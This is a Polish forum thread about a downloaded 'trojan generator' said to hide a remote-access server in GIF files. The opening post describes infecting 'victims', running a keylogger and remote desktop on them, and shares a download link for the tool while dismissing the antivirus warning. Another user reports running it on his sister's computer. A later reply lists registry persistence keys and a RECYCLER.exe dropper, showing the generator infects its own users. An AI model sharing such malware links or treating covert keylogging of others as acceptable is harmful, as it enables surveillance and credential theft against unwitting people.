Trojan zapisujący w GIF'ach

formular

Użytkownik
Dołączył
Styczeń 30, 2007
Posty
1
siemka

ostatnio z jakiejś stronki ściągnąłem generator trojana, który zapisuje do pliku gif. Niby wszystko ładnie generuje, tworzy nowy plik itp, działa na protokole GG lub wpisujesz IP ofiary. Ale na moim drugim kompie jak prześlę plik serwera to jakoś dziwnie działa, tzn długo się ładuje. Mogę sobie sterować, włączyuć kejlogera, wszystko działa. Tylko zainfekowany komp jakoś tak mizernie (mam P2 350, 64 RAM, grafika 16mb). Może za słaba konfiguracja jest komputera którego infekuję?

Acha, po co jest zdalny pulpit? Czy mogę za jego pośrednictwem sterować pulpitem zainfekowanej ofiary?

Plik do generatora jest tutaj:
http://ringtones.exh.pl/trojanMaker.rar


Uwaga, ten plik nie jest wirusem. Wiem, bo zainstalowałem (mimo że antywir krzyczał) ale nic się z moim kompem nie dzieje złego. Skanowałem kompa i jedyny plik który twierdzi że jest zainfekowany to wygenerowany plik serwera.

Napiszcie czy kompy waszych ofiar też tak przymulają, czy to tylko wina starego komputera.
 

bezkitu

Użytkownik
Dołączył
Styczeń 25, 2007
Posty
1
troojan działa, na kompie siostry śmiga że aż miło patrzeć
smile.gif



chyba za starego złoma masz
 

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
Niespodzianka:

Kod:
SOFTWAREMicrosoftWindowsCurrentVersionRun



SoftwareMicrosoftWindows NTCurrentVersionWinlogon



RECYCLER.exe



System operacyjny serwera: Microsoft Windows 3.1



[email][email protected][/email] nastyserver2

Sprawdz co znajduje sie w katalogu C:RECYCLER oraz w podanych kluczach rejestru. Nasty shit zapewne wykrywa system jako "Windows 3.1"
<
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Nie jest?
Kolejne dziecko wierzące w magie .JPG
Jak ufo, wszyscy mówią że widzieli bindy trojanów do .rec .jpg a nikt niema dowodu...
skann.jpg

CO byś z taką wykrywialnością zrobił??
 

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
Kod:
HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon 

Shell "explorer.exe C:RECYCLER.exe"
Shit!
<
k:
 
Do góry Bottom